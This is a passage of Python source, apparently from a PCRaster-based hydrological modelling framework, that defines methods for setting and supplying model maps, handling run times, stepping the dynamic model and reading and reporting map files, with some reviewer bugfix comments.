"Cannot open ini file: " + os.path.join(caseName, configfile)
)
sys.exit(1)
return config
def wf_setValuesAsNumpy(self, mapname, values):
"""
set a map with values from a numpy array. Current settings for
dimensions are assumed. if the name of the maps contains the string "LDD" or "ldd"
the maps is assumed to be an LDD maps and an lddrepair call is made,
assume -999 as missing value
also checks if map contains int at end, then map is part of List object:
map_0 is part of self.map[0]
Input:
- mapname - string with name of map
- values - numpy array
:returns: 1 if the map was present, 0 if a new map was created
"""
arpcr = pcr.numpy2pcr(pcr.Scalar, np.flipud(values).copy(), -999)
self.setviaAPI[mapname] = 1
if hasattr(self._userModel(), mapname):
if "LDD" in mapname.upper():
setattr(self._userModel(), mapname, pcr.lddrepair(pcr.ldd(arpcr)))
else:
if mapname.split('_')[-1].isdigit():
getattr(self._userModel(), mapname.split('_')[0])[int(mapname.split('_')[-1])] = arpcr
else:
setattr(self._userModel(), mapname, arpcr)
return 1
else:
self.logger.debug(
mapname + " is not defined in the usermodel: setting anyway"
)
if mapname.split('_')[-1].isdigit():
getattr(self._userModel(), mapname.split('_')[0])[int(mapname.split('_')[-1])] = arpcr
else:
setattr(self._userModel(), mapname, arpcr)
return 0
def wf_setValuesAsPcrMap(self, mapname, pcrmap):
"""
set a map with values from a pcrmap. Current settings for
dimensions are assumed.
also checks if map contains int at end, then map is part of List object:
map_0 is part of self.map[0]
Input:
- mapname - string with name of map
- pcrmap - pcraster map
:returns: 1 if the map was present, 0 if a new map was created
"""
arpcr = pcrmap
self.setviaAPI[mapname] = 1
if hasattr(self._userModel(), mapname):
if mapname.split('_')[-1].isdigit():
getattr(self._userModel(), mapname.split('_')[0])[int(mapname.split('_')[-1])] = arpcr
else:
setattr(self._userModel(), mapname, arpcr)
return 1
else:
self.logger.debug(
mapname + " is not defined in the usermodel: setting anyway"
)
if mapname.split('_')[-1].isdigit():
getattr(self._userModel(), mapname.split('_')[0])[int(mapname.split('_')[-1])] = arpcr
else:
setattr(self._userModel(), mapname, arpcr)
return 0
def wf_setValues(self, mapname, values):
"""
set a map with values from a python list or a single scalar
value. In case a single value is specified the value will be distributed
uniformly over the map. Current settings for
dimensions are assumed.
also checks if map contains int at end, then map is part of List object:
map_0 is part of self.map[0]
Input:
- mapname - string with name of map
- values - single list of value of length rows * cols or a single
scalar
:returns: 1 if the map was present, 0 if a new map was created
"""
self.setviaAPI[mapname] = 1
if isinstance(values, list):
ar = np.array(values)
ar.reshape(getrows(), getcols())
arpcr = pcr.numpy2pcr(pcr.Scalar, ar.reshape(getrows(), getcols()), -999)
else:
self.logger.debug("Setting single value: " + str(values))
arpcr = pcr.cover(pcr.scalar(values))
if hasattr(self._userModel(), mapname):
if mapname.split('_')[-1].isdigit():
getattr(self._userModel(), mapname.split('_')[0])[int(mapname.split('_')[-1])] = arpcr
else:
setattr(self._userModel(), mapname, arpcr)
return 1
else:
self.logger.debug(
mapname + " is not defined in the usermodel: setting anyway"
)
if mapname.split('_')[-1].isdigit():
getattr(self._userModel(), mapname.split('_')[0])[int(mapname.split('_')[-1])] = arpcr
else:
setattr(self._userModel(), mapname, arpcr)
return 0
def wf_setValueRowCol(self, mapname, value, row, col):
"""
set single value in a map on row, col (0 based). All other values in the
map remain the same. Numbering starts at the upper left corner.
also checks if map contains int at end, then map is part of List object:
map_0 is part of self.map[0]
Input:
- mapname - string with name of map
- row - row to set the value in
- col - column to set the value in
- values - single scalar
:returns: 1 if the map was present, 0 if nothing was done
"""
self.setviaAPI[mapname] = 1
if hasattr(self._userModel(), mapname):
if mapname.split('_')[-1].isdigit():
ar = pcr.pcr2numpy(getattr(self._userModel(), mapname.split('_')[0])[int(mapname.split('_')[-1])])
else:
ar = pcr.pcr2numpy(getattr(self._userModel(), mapname), -999)
ar[row, col] = value
arpcr = pcr.numpy2pcr(pcr.Scalar, ar.copy(), -999)
if mapname.split('_')[-1].isdigit():
getattr(self._userModel(), mapname.split('_')[0])[int(mapname.split('_')[-1])] = arpcr
else:
setattr(self._userModel(), mapname, arpcr)
return 1
else:
self.logger.debug(
mapname + " is not defined in the usermodel. Doing nothing"
)
return 0
def wf_setValue(self, mapname, value, xcor, ycor):
"""
set single value in a map on xcor, ycor (0 based). All other values in the
map remain the same.
Also checks if map contains int at end, then map is part of List object:
map_0 is part of self.map[0]
Input:
- mapname - string with name of map
- xcor - xcor to set the value in
- ycor - ycor to set the value in
- value - single scalar
:returns: 1 if the map was present, 0 if nothing was done
"""
self.setviaAPI[mapname] = 1
if hasattr(self._userModel(), mapname):
if mapname.split('_')[-1].isdigit():
pcrmap = getattr(self._userModel(), mapname.split('_')[0])[int(mapname.split('_')[-1])]
else:
pcrmap = getattr(self._userModel(), mapname)
ar = pcr.pcr2numpy(pcr.scalar(pcrmap), -999)
row, col = getRowColPoint(pcrmap, xcor, ycor)
ar[row, col] = value
save("tt.np", ar)
pcrmap = pcr.numpy2pcr(pcr.Scalar, ar.copy(), -999)
pcr.report(pcrmap, "zz.map")
if mapname.split('_')[-1].isdigit():
getattr(self._userModel(), mapname.split('_')[0])[int(mapname.split('_')[-1])] = pcrmap
else:
setattr(self._userModel(), mapname, pcrmap)
return 1
else:
self.logger.debug(mapname + " is not defined in the usermodel")
return 0
def wf_setValueLdd(self, mapname, value, xcor, ycor):
"""
set single value in an ldd on xcor, ycor (0 based). All other values in the
map remain the same. Calls lddrepair to ensure the ldd is sound
Input:
- mapname of tipy ldd - string with name of map
- xcor - xcor to set the value in
- ycor - ycor to set the value in
- values - single scalar (see pcraster ldddescription for legal values)
e.g. use 5 for setting a pit
:returns: 1 if the map was present, 0 if nothing was done
"""
self.setviaAPI[mapname] = 1
if hasattr(self._userModel(), mapname):
pcrmap = getattr(self._userModel(), mapname)
ar = pcr.pcr2numpy(pcrmap, -999)
row, col = getRowColPoint(pcrmap, xcor, ycor)
ar[row, col] = value
arpcr = pcr.numpy2pcr(pcr.Scalar, ar.copy(), -999)
setattr(self._userModel(), mapname, pcr.lddrepair(pcr.ldd(arpcr)))
return 1
else:
self.logger.debug(
mapname + " is not defined in the usermodel, doing nothing"
)
return 0
def wf_multParameterValues(self, mapname, value):
"""
multiply a parameter map with a single scalar
value. Current settings for dimensions are assumed.
This method must be called *after* the runinitial() method
Input:
- mapname - string with name of map
- value - single scalar
:returns: 1 if the map was present, 0 if nothing was done
"""
arpcr = pcr.cover(value)
self.setviaAPI[mapname] = 1
if hasattr(self._userModel(), mapname):
setattr(
self._userModel(), mapname, arpcr * getattr(self._userModel(), mapname)
)
return 1
else:
self.logger.debug(
mapname + " is not defined in the usermodel, doing nothing"
)
return 0
def wf_multParameterValuesArea(self, mapname, value, areacode, areamapname):
    """
    Multiply a parameter map with a single scalar value, but only for the
    cells where the area map equals areacode. Current settings for
    dimensions are assumed. This method must be called *after* the
    runinitial() method.

    Input:

    - mapname - string with name of map to modify
    - value - single scalar
    - areacode - id of the area in the areamap
    - areamapname - name of the areamap

    :returns: 1 if the map was present, 0 if nothing was done
    """
    arpcr = pcr.cover(value)
    self.setviaAPI[mapname] = 1
    if hasattr(self._userModel(), mapname):
        # BUGFIX: the original multiplied and returned the AREA map
        # (areamapname) instead of the target map (mapname), and compared
        # the area map against str(areacode) rather than the code itself.
        setattr(
            self._userModel(),
            mapname,
            pcr.ifthenelse(
                getattr(self._userModel(), areamapname) == areacode,
                arpcr * getattr(self._userModel(), mapname),
                getattr(self._userModel(), mapname),
            ),
        )
        return 1
    else:
        self.logger.debug(
            mapname + " is not defined in the usermodel, doing nothing"
        )
        return 0
def wf_setParameterValues(self, mapname, values):
    """
    Set a parameter map with values from a python list or a single scalar
    value. In case a single value is specified the value will be
    distributed uniformly over the map. Current settings for dimensions
    are assumed. This method must be called _after_ the runinitial()
    method.

    Input:

    - mapname - string with name of map
    - values - single list of values of length rows * cols, or a single
      scalar

    :returns: 1 if the map was present, 0 if nothing was done
    """
    self.setviaAPI[mapname] = 1
    if isinstance(values, list):
        # The original also called ar.reshape(...) with the result
        # discarded (ndarray.reshape returns a new array); that dead
        # statement has been removed.
        ar = np.array(values)
        arpcr = pcr.numpy2pcr(pcr.Scalar, ar.reshape(getrows(), getcols()), -999)
    else:
        arpcr = pcr.cover(values)
    if hasattr(self._userModel(), mapname):
        setattr(self._userModel(), mapname, arpcr)
        return 1
    else:
        self.logger.debug(
            mapname + " is not defined in the usermodel, doing nothing"
        )
        return 0
def wf_supplyParameterAsList(self, mapname):
    """
    Return a python list for the specified parameter map for the current
    timestep. If the map is not dynamic, the current status of the map is
    returned.

    Input:

    - mapname (string)

    Output:

    - list (empty when the map is unknown)
    """
    model = self._userModel()
    if not hasattr(model, mapname):
        self.logger.debug(
            mapname + " is not defined in the usermodel, returning empty list"
        )
        return []
    asnumpy = pcr.pcr2numpy(getattr(model, mapname), -999)
    return asnumpy.flatten().tolist()
def wf_supplyMapAsList(self, mapname):
    """
    Return a python list for the specified map for the current timestep.
    If the map is not dynamic the current status of the map is returned,
    which may be undefined for maps that are filled with data at the end
    of a run.

    Input:

    - mapname (string)

    Output:

    - list (empty when the map is unknown)
    """
    model = self._userModel()
    if not hasattr(model, mapname):
        self.logger.warning(
            mapname + " is not defined in the usermodel, returning empty list"
        )
        return []
    asnumpy = pcr.pcr2numpy(getattr(model, mapname), -999)
    if self.APIDebug:
        self.logger.debug("wf_supplyMapAsList returning: " + mapname)
    return asnumpy.flatten().tolist()
def wf_supplyMapAsNumpy(self, mapname):
    """
    Returns a numpy array (matrix) for the specified map and the current
    timestep. If the maps is not dynamic the current status of the map is
    returns which may be undefined for maps that are filled with data
    at the end of a run.

    Also checks if map contains int at end, then map is part of List object:
    map_0 is part of self.map[0]

    Missing value is -999

    Input:

    - mapname (string)

    Output:

    - numpy array (or [] when the map is unknown)
    """
    if hasattr(self._userModel(), mapname):
        if mapname.split('_')[-1].isdigit():
            # Indexed form: "name_N" selects element N of the list attribute
            # "name". NOTE(review): hasattr above tests the literal name
            # "name_N", so the model apparently also exposes that alias —
            # confirm against the user models.
            pcrmap = getattr(self._userModel(), mapname.split('_')[0])[int(mapname.split('_')[-1])]
        else:
            pcrmap = getattr(self._userModel(), mapname)
        if isinstance(pcrmap, pcraster._pcraster.Field):
            # pcraster field: convert to numpy and flip vertically.
            tt = pcr.pcr2numpy(pcrmap, -999.0)
            retval = np.flipud(tt).copy()
        else:
            # Non-field values are passed through as (or coerced to) ndarray.
            if type(pcrmap) == np.ndarray:
                retval = pcrmap
            else:
                retval = np.array(pcrmap)
        if self.APIDebug:
            self.logger.debug("wf_supplyMapAsNumpy returning: " + mapname)
    else:
        self.logger.warning(
            mapname + " is not defined in the usermodel, returning empty array"
        )
        return []
    return retval
def wf_supplyMapXAsNumpy(self):
    """
    Return the x-coordinates of the current clone map as a numpy array.

    Missing value is -999
    """
    xmap = pcr.xcoordinate(pcr.spatial(pcr.boolean(1.0)))
    ascopy = pcr.pcr_as_numpy(xmap).copy()
    return np.flipud(ascopy).copy()
def wf_supplyMapYAsNumpy(self):
    """
    Return the y-coordinates of the current clone map as a numpy array.

    Missing value is -999
    """
    ymap = pcr.ycoordinate(pcr.spatial(pcr.boolean(1.0)))
    ascopy = pcr.pcr_as_numpy(ymap).copy()
    return np.flipud(ascopy).copy()
def wf_supplyMapZAsNumpy(self):
    """
    Return the z-coordinates of the current clone map as a numpy array.

    Assumes an Altitude map is present in the user model; otherwise an
    empty list is returned. Missing value is -999.
    """
    model = self._userModel()
    if not hasattr(model, "Altitude"):
        self.logger.warning(
            "Altitude is not defined in the usermodel, returning empty list"
        )
        return []
    altitude = getattr(model, "Altitude")
    return np.flipud(pcr.pcr2numpy(altitude, -999)).copy()
def wf_supplyMapOrigin(self):
    """
    :return: lower left corner of the map as a numpy array [X, Y]
    """
    # BUGFIX: the original called X.flatten.min() / Y.flatten.min(),
    # missing the call parentheses on flatten, which raises
    # AttributeError at runtime. min() over the whole array is equivalent
    # to flattening first. The unused `a = pcr.boolean(1)` was removed.
    Y = self.wf_supplyMapYAsNumpy()
    X = self.wf_supplyMapXAsNumpy()
    return np.array([X.min(), Y.min()])
def wf_supplyMapAsPcrMap(self, mapname):
    """
    Return a pcraster map object for the specified map for the current
    timestep. If the map is not dynamic the current status of the map is
    returned, which may be undefined for maps that are filled with data
    at the end of a run.

    Missing value is -999

    Input:

    - mapname (string)

    Output:

    - pcraster map (or [] when the map is unknown)
    """
    model = self._userModel()
    if not hasattr(model, mapname):
        self.logger.warning(
            mapname + " is not defined in the usermodel, returning empty list"
        )
        return []
    if self.APIDebug:
        self.logger.debug("wf_supplyMapAsNumpy returning: " + mapname)
    return getattr(model, mapname)
def wf_supplyGridDim(self):
    """
    Return the dimensions of the current model grid as a list::

        [ Xul, Yul, xsize, ysize, rows, cols, Xlr, Ylr]
    """
    dims = getgridparams()
    return dims
def wf_supplyVariableNamesAndRoles(self):
    """
    Returns a list of variables
    List of list with the following structure::

        [[ name, role, unit]
         [ name, role, unit]
         ...
        ]

        role: 0 = input (to the model)
              1 = is output (from the model)
              2 = input/output (state information)
              3 = model parameter
        unit: 0 = mm/timestep
              1 = m^3/sec
              2 = m
              3 = degree Celcius
              4 = mm
              5 = -

    The first time this function is called the exchangeitems object is filled
    with data from the ini file.
    """
    # NOTE: "exchnageitems" is a (misspelled) attribute name used throughout
    # the framework; it cannot be renamed here without touching all users.
    res = self.exchnageitems.getvars()
    # Fill object with data from ini file (only on the first call, when the
    # exchange-item list is still empty).
    # TODO: clean up!!
    if len(res) == 0:
        API = configsection(self._userModel().config, "API")
        for a in API:
            tt = []
            # Each [API] entry has the form "role,unit" for variable `a`.
            line = self._userModel().config.get("API", a)
            tt.append(a)
            tt.append(int(line.split(",")[0]))
            tt.append((line.split(",")[1]))
            res.append(tt)
            self.exchnageitems.addvar(tt[0], tt[1], tt[2])
    if hasattr(self._userModel(), "supplyVariableNamesAndRoles"):
        # NOTE(review): the user-model override is only queried when
        # APIDebug is on; otherwise the ini-derived list is returned even
        # though the model provides its own — confirm this is intended.
        if self.APIDebug:
            res = self._userModel().supplyVariableNamesAndRoles()
            self.logger.debug(
                "wf_supplyVariableNamesAndRoles from usermodel: " + str(res)
            )
        return res
    else:
        if self.APIDebug:
            self.logger.debug(
                "wf_supplyVariableNamesAndRoles from framework: " + str(res)
            )
        return res
def wf_supplyVariableNames(self):
    """
    :returns: list with the names of all exchange variables
    """
    names = [entry[0] for entry in self.wf_supplyVariableNamesAndRoles()]
    if self.APIDebug:
        self.logger.debug("wf_supplyVariableNames from framework: " + str(names))
    return names
def wf_supplyVariableRoles(self):
    """
    :returns: list with the roles of all exchange variables
    """
    roles = [entry[1] for entry in self.wf_supplyVariableNamesAndRoles()]
    if self.APIDebug:
        self.logger.debug("wf_supplyVariableRoles from framework: " + str(roles))
    return roles
def wf_supplyVariableCount(self):
    """
    :returns: number of exchangeable variables
    """
    count = len(self.wf_supplyVariableNamesAndRoles())
    if self.APIDebug:
        self.logger.debug(
            "wf_supplyVariableCount from framework: " + str(count)
        )
    return count
def wf_supplyVariableUnits(self):
    """
    :returns: list with the units of all exchange variables
    """
    units = [entry[2] for entry in self.wf_supplyVariableNamesAndRoles()]
    if self.APIDebug:
        self.logger.debug("wf_supplyVariableUnits from framework: " + str(units))
    return units
def wf_supplyEndTime(self):
    """
    Get the end time of the model run.

    :return: end time as seconds since the UNIX epoch (UTC)
    """
    return calendar.timegm(self.DT.runEndTime.utctimetuple())
def wf_supplyStartTime(self):
    """
    Get the start time of the model run.

    :return: start time as seconds since the UNIX epoch (UTC)
    """
    return calendar.timegm(self.DT.runStartTime.utctimetuple())
def wf_supplyCurrentTime(self):
    """
    Get the current model time.

    Output:

    - current model date/time expressed as seconds since the UNIX epoch
    """
    return calendar.timegm(self.DT.currentDateTime.utctimetuple())
def wf_supplyCurrentDateTime(self):
    """
    Get the current model time as a datetime object.

    Output:

    - current model date/time (datetime)
    """
    return self.DT.currentDateTime
def wf_supplyStartDateTime(self):
    """
    Get the start of the model run as a datetime object.

    Output:

    - run start date/time (datetime)
    """
    return self.DT.runStartTime
def wf_supplyEpoch(self):
    """
    Supply the time epoch as a CF-convention string.

    Output:

    - "seconds since <epoch>" string describing the UNIX epoch
    """
    epoch = time.gmtime(0)
    # struct_time[:6] is (year, month, day, hour, minute, second).
    return "seconds since %04d-%02d-%02d %02d:%02d:%02d.0 00:00" % epoch[:6]
def wf_supplyRowCol(self, mapname, xcor, ycor):
    """
    Return the (row, col) tuple for the given X and Y coordinate.

    Input:

    - mapname
    - xcor
    - ycor

    Output:

    - tuple with row, col
    """
    rowcol = getRowColPoint(mapname, xcor, ycor)
    if self.APIDebug:
        self.logger.debug("wf_supplyRowCol from framework: " + str(rowcol))
    return rowcol
def wf_supplyScalar(self, mapname, xcor, ycor):
    """
    Return a single value for the x and y coordinates from the given map,
    using getValAtPoint(in_map, xcor, ycor) from terrain_lib.py.

    Input:

    - mapname
    - xcor
    - ycor

    Output:

    - value at location xcor, ycor
    """
    themap = getattr(self._userModel(), mapname)
    value = getValAtPoint(themap, xcor, ycor)
    if self.APIDebug:
        self.logger.debug("wf_supplyScalar from framework: " + str(value))
    return value
def wf_supplyScalarRowCol(self, mapname, row, col):
    """
    Return a single value for the given (zero-based) row and col from
    the named map.

    Input:

    - mapname
    - row
    - col

    Output:

    - value at location row, col
    """
    themap = getattr(self._userModel(), mapname)
    # pcr.cellvalue is 1-based and returns (value, isValid).
    value, _valid = pcr.cellvalue(themap, row + 1, col + 1)
    return value
def _userModel(self):
    """Return the user-supplied model instance held by the framework."""
    return self._d_model
def _runDynamic(self, firststep, laststep):
    """
    Runs the dynamic model from firststep to laststep

    Input:

    :ivar firststep: first timestep of the model run (0 = use configured
                     first timestep)
    :ivar laststep: last timestep of the model run (0 = use configured
                    last timestep)
    """
    self._userModel()._setInDynamic(True)
    #
    # A value of 0 means "fall back to the configured first/last step".
    if firststep == 0:
        step = self._d_firstTimestep
    else:
        step = firststep
    if laststep == 0:
        laststep = self._d_lastTimestep
    self._userModel()._setNrTimeSteps(int(laststep))
    # Synchronise the date/time bookkeeping before entering the loop.
    self.DT.update(
        currentTimeStep=self.DT.currentTimeStep, mode=self.runlengthdetermination
    )
    while step <= self._userModel().nrTimeSteps():
        self._incrementIndentLevel()
        self._atStartOfTimeStep(step)
        self._userModel()._setCurrentTimeStep(step)
        if hasattr(self._userModel(), "dynamic"):
            self._incrementIndentLevel()
            self._traceIn("dynamic")
            self._userModel().dynamic()
            self._traceOut("dynamic")
            self._decrementIndentLevel()
        # Save state variables in memory
        self.wf_QuickSuspend()
        # Make the summary variables
        for a in range(0, len(self.statslst)):
            data = getattr(self._userModel(), self.statslst[a].varname)
            self.statslst[a].add_one(data)
        # Online statistics (rolling mean for now)
        for key in self.onlinestat.statvarname:
            stvar = self.onlinestat.getstat(getattr(self._userModel(), key), key)
            # stvar = self.onlinestat.getstat(pcr.cover(self.DT.currentTimeStep * 1.0), key)
            setattr(self._userModel(), self.onlinestat.statvarname[key], stvar)
        # Increment one timesteps
        self.DT.update(incrementStep=True, mode=self.runlengthdetermination)
        self._userModel().currentdatetime = self.DT.currentDateTime
        # Persist per-timestep output (maps and timeseries).
        self.wf_savedynMaps()
        self.wf_saveTimeSeries()
        self.logger.debug(
            "timestep: "
            + str(self._userModel().currentTimeStep())
            + "/"
            + str(self.DT.lastTimeStep)
            + " ("
            + str(self.DT.currentDateTime)
            + ")"
        )
        self._timeStepFinished()
        self._decrementIndentLevel()
        step += 1
    # API overrides only apply to the run they were set in.
    self.setviaAPI = {}
    self._userModel()._setInDynamic(False)
## \brief Re-implemented from ShellScript.
#
# Runs a dynamic user model.
def run(self):
    """Run the dynamic model for all timesteps and return 0."""
    self._atStartOfScript()
    usermodel = self._userModel()
    # A model that supports resume starts from a saved state, unless the
    # run begins at the very first timestep.
    if hasattr(usermodel, "resume") and usermodel.firstTimeStep() != 1:
        self._runResume()
    else:
        self._runInitial()
    self._runDynamic()
    # only execute this section while running filter frameworks
    if hasattr(usermodel, "suspend") and hasattr(usermodel, "filterPeriod"):
        self._runSuspend()
    return 0
def reportStatic(self, variable, name, style=1, gzipit=False, longname=None):
    """
    Report a static (time-independent) variable using the configured
    output format.

    :param variable: map to write
    :param name: output file name, also used as the netCDF variable name
    :param style: unused, kept for interface compatibility
    :param gzipit: gzip the resulting file (pcraster output only)
    :param longname: long variable name for netCDF output (defaults to name)
    :return: None
    """
    if longname is None:  # was "== None"; use identity comparison for None
        longname = name
    path = name
    if self.outputFormat == 1:
        # Without a netCDF output object, fall back to a pcraster map file.
        if not hasattr(self, "NcOutputStatic"):
            pcr.report(variable, path)
            if gzipit:
                Gzip(path, storePath=True)
        else:
            self.NcOutputStatic.savetimestep(1, variable, var=name, name=longname)
    elif self.outputFormat in (2, 3):
        # Formats 2 (numpy) and 3 (matlab) were duplicated identical
        # branches; merged without behavior change.
        np.savez(path, pcr.pcr2numpy(variable, -999))
    elif self.outputFormat == 4:
        np.savetxt(path, pcr.pcr2numpy(variable, -999), fmt="%0.6g")
def reportState(self, variable, name, style=1, gzipit=False, longname=None):
    """
    Report a state variable using the configured output format.

    :param variable: map to write
    :param name: output file name, also used as the netCDF variable name
    :param style: unused, kept for interface compatibility
    :param gzipit: gzip the resulting file (pcraster output only)
    :param longname: long variable name for netCDF output (defaults to name)
    :return: None
    """
    if longname is None:  # was "== None"; use identity comparison for None
        longname = name
    path = name
    if self.outputFormat == 1:
        # Without a netCDF state object, fall back to a pcraster map file.
        if not hasattr(self, "NcOutputState"):
            pcr.report(variable, path)
            if gzipit:
                Gzip(path, storePath=True)
        else:
            self.NcOutputState.savetimestep(1, variable, var=name, name=longname)
    elif self.outputFormat in (2, 3):
        # Formats 2 (numpy) and 3 (matlab) were duplicated identical
        # branches; merged without behavior change.
        np.savez(path, pcr.pcr2numpy(variable, -999))
    elif self.outputFormat == 4:
        np.savetxt(path, pcr.pcr2numpy(variable, -999), fmt="%0.6g")
def _reportNew(self, variable, name, style=1, gzipit=False, longname=None):
    """
    Report a map for the current timestep.

    outputformat: (set in the [framework] section of the init file).
    1: pcraster
    2: numpy (compressed)
    3: matlab
    4: numpy text files (large and slow)

    ..

    # Example:

    [framework]
    outputformat = 4
    """
    if longname is None:  # was "== None"; use identity comparison for None
        longname = name
    directoryPrefix = ""
    nameSuffix = ".map"
    newName = ""
    # Determine the output file name depending on the framework phase.
    if hasattr(self._userModel(), "_inStochastic"):
        if self._userModel()._inStochastic():
            if self._userModel()._inPremc():
                newName = name + nameSuffix
            elif self._userModel()._inPostmc():
                newName = name + nameSuffix
            else:
                directoryPrefix = str(self._userModel().currentSampleNumber())
    if self._userModel()._inInitial():
        newName = name + nameSuffix
    if hasattr(self._userModel(), "_inDynamic"):
        if self._userModel()._inDynamic() or self._inUpdateWeight():
            # Dynamic output gets the 8.3-style timestep suffix.
            newName = pcraster.framework.generateNameT(
                name, self._userModel().currentTimeStep()
            )
    if newName == "":  # For files from suspend
        newName = name
    path = os.path.join(directoryPrefix, newName)
    if self.outputFormat == 1:
        # Without a netCDF output object, fall back to a pcraster map file.
        if not hasattr(self, "NcOutput"):
            pcr.report(variable, path)
            if gzipit:
                Gzip(path, storePath=True)
        else:
            self.NcOutput.savetimestep(
                self._userModel().currentTimeStep(),
                variable,
                var=name,
                name=longname,
            )
    elif self.outputFormat in (2, 3):
        # Formats 2 (numpy) and 3 (matlab) were duplicated identical
        # branches; merged without behavior change. The unused
        # `head, tail = os.path.split(name)` was removed.
        np.savez(path, pcr.pcr2numpy(variable, -999))
    elif self.outputFormat == 4:
        np.savetxt(path, pcr.pcr2numpy(variable, -999), fmt="%0.6g")
def wf_readmapClimatology(self, name, kind=1, default=0.0, verbose=1):
    """
    Read a climatology map. The current date/time is converted to:

    1: a month and the file for the current month is returned
    2: day of year and the file for the current day is returned
    3: hour of day and the file for the current hour is returned
       (NOTE(review): kind 3 is documented here but not implemented
       below — it falls through to the error branch; confirm intended)

    :param name: name if the mapstack
    :param kind: type of the climatology
    :return: a map (or the scalar default when the file is missing)
    """
    # A variable set through the API overrides the on-disk climatology.
    if os.path.basename(name) in self.setviaAPI:
        self.setviaAPI.pop(os.path.basename(name))
        self.logger.debug(
            os.path.basename(name)
            + " set via API, not reading from file, using memory copy"
        )
        return getattr(self._userModel(), os.path.basename(name))
    # TODO: Add support for netcdf files
    directoryPrefix = ""
    if kind == 1:
        # Monthly climatology: mapstack number 1..12.
        month = self.DT.currentDateTime.month
        newName = pcraster.framework.generateNameT(name, month)
        path = os.path.join(directoryPrefix, newName)
        if os.path.isfile(path):
            mapje = pcr.readmap(path)
            return mapje
        else:
            if verbose:
                self.logger.warning(
                    "Climatology data ("
                    + path
                    + ") for timestep not present, returning "
                    + str(default)
                )
            return pcr.scalar(default)
    elif kind == 2:
        # Day-of-year climatology: mapstack number 1..366.
        yday = self.DT.currentDateTime.timetuple().tm_yday
        newName = pcraster.framework.generateNameT(name, yday)
        path = os.path.join(directoryPrefix, newName)
        if os.path.isfile(path):
            mapje = pcr.readmap(path)
            return mapje
        else:
            if verbose:
                self.logger.warning(
                    "Climatology data ("
                    + path
                    + ") for timestep not present, returning "
                    + str(default)
                )
            return pcr.scalar(default)
    else:
        self.logger.error(
            "This Kind of climatology not implemented yet: " + str(kind)
        )
def wf_readmap(
    self,
    name,
    default,
    verbose=True,
    fail=False,
    ncfilesource="not set",
    silent=False,
):
    """
    Adjusted version of readmapNew. The style variable (taken from the
    exchange items) indicates how the data is read::

        1 - default: reads pcrmaps (or netCDF when configured)
        2 - memory: assumes the map is made available (in memory) using
            the in-memory interface

    :param name: (path) name of the map or mapstack
    :param default: scalar returned when the data cannot be found
    :param verbose: log a debug message when falling back to the default
    :param fail: raise ValueError instead of returning the default
    :param ncfilesource: netCDF source file used when resuming states
    :param silent: suppress the error log message when fail is set
    """
    directoryPrefix = ""
    nameSuffix = ".map"
    newName = ""
    varname = os.path.basename(name)
    # find if this is an exchnageitem
    thevars = self.exchnageitems.getvars()
    if len(thevars) == 0:
        self.wf_supplyVariableNamesAndRoles()
    style = self.exchnageitems.getvarStyle(varname)
    # set this for initial (before the model is actually running)
    if os.path.splitext(name)[1] == ".map":
        newName = name
    else:
        newName = name + nameSuffix
    # A variable set through the API overrides reading from disk.
    if os.path.basename(name) in self.setviaAPI:
        self.setviaAPI.pop(os.path.basename(name))
        self.logger.debug(
            os.path.basename(name)
            + " set via API, not reading from file, using memory copy"
        )
        return getattr(self._userModel(), os.path.basename(name))
    # Determine the file name depending on the framework phase.
    if hasattr(self._userModel(), "_inStochastic"):
        if self._userModel()._inStochastic():
            if self._userModel()._inPremc() or self._userModel()._inPostmc():
                newName = name + nameSuffix
            else:
                directoryPrefix = str(self._userModel().currentSampleNumber())
    if hasattr(self._userModel(), "_inInitial"):
        if self._userModel()._inInitial():
            if os.path.splitext(name)[1] == ".map":
                newName = name
            else:
                newName = name + nameSuffix
    if self._inResume():
        if os.path.splitext(name)[1] == ".map":
            newName = name
        else:
            newName = name + nameSuffix
    if hasattr(self._userModel(), "_inDynamic"):
        if self._userModel()._inDynamic() or self._inUpdateWeight():
            timestep = self._userModel().currentTimeStep()
            if "None" not in self.ncfile:
                newName = name
            else:
                newName = pcraster.framework.generateNameT(name, timestep)
    if style == 1:  # Normal reading of mapstack from DISK or via netcdf
        path = os.path.join(directoryPrefix, newName)
        # BUGFIX: was `assert path is not ""` — an identity comparison
        # against a literal (SyntaxWarning in py3.8+) that does not
        # reliably test for emptiness.
        assert path != ""
        if self._userModel()._inDynamic():
            if "None" not in self.ncfile:
                retval, succ = self.NcInput.gettimestep(
                    self._userModel().currentTimeStep(),
                    self.logger,
                    tsdatetime=self.DT.nextDateTime,
                    var=varname,
                    shifttime=self.DT.startadjusted,
                )
                if succ:
                    return retval
                else:
                    return pcr.cover(pcr.scalar(default))
            if os.path.isfile(path):
                mapje = pcr.readmap(path)
                return mapje
            else:
                if verbose:
                    self.logger.debug(
                        "Input data ("
                        + os.path.abspath(path)
                        + ") for timestep not present, returning "
                        + str(default)
                    )
                if fail:
                    self.logger.error(
                        "Required map: "
                        + os.path.abspath(path)
                        + " not found, exiting.."
                    )
                    raise ValueError("Input map not found")
                return pcr.cover(pcr.scalar(default))
        elif self._userModel()._inInitial():
            if "None" not in self.ncfilestatic:
                retval, succ = self.NcInputStatic.gettimestep(
                    1, self.logger, var=varname
                )
                if succ:
                    return retval
                else:
                    if fail:
                        if not silent:
                            self.logger.error(
                                "Required map: "
                                + os.path.abspath(path)
                                + " not found in "
                                + self.ncfilestatic
                                + " exiting.."
                            )
                        raise ValueError(
                            "Input static variable not found in netcdf"
                        )
                    else:
                        return self.TheClone + default
            if os.path.isfile(path):
                mapje = pcr.readmap(path)
                return mapje
            else:
                if verbose:
                    self.logger.debug(
                        "Static input data ("
                        + os.path.abspath(path)
                        + ") not present, returning "
                        + str(default)
                    )
                if fail:
                    if not silent:
                        self.logger.error(
                            "Required map: "
                            + os.path.abspath(path)
                            + " not found, exiting.."
                        )
                    raise ValueError("Input static variable not found")
                return self.TheClone + default
        elif self._inResume():
            # NOTE(review): `ncfilesource not in "None"` is a substring
            # test on the string "None" (so the default "not set" passes
            # it); presumably meant as a not-configured check — confirm.
            if ncfilesource == self.ncinfilestates and ncfilesource not in "None":
                retval, succ = self.NcInputStates.gettimestep(
                    1, self.logger, var=varname, tsdatetime=self.DT.runStateTime
                )
                if succ:
                    return retval
                else:
                    if fail:
                        if not silent:
                            self.logger.error(
                                "Required map: "
                                + os.path.abspath(path)
                                + " not found, exiting.."
                            )
                        raise ValueError("Input state variable not found")
                    return self.TheClone + default
            if os.path.isfile(path):
                mapje = pcr.readmap(path)
                return mapje
            else:
                if verbose:
                    self.logger.debug(
                        "State input data ("
                        + os.path.abspath(path)
